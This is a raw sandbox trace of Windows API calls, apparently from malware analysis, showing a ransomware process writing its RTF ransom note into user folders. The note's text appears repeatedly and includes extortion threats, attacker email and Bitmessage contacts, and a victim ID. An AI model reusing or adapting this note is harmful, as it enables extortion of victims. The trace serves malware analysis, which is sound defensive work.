lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.567] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.567] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.568] CloseHandle (hObject=0x2c8) returned 1 [0278.568] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\#readme_eman#.rtf")) returned 0xffffffff [0278.568] GetLastError () returned 0x2 [0278.568] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\fr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.568] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 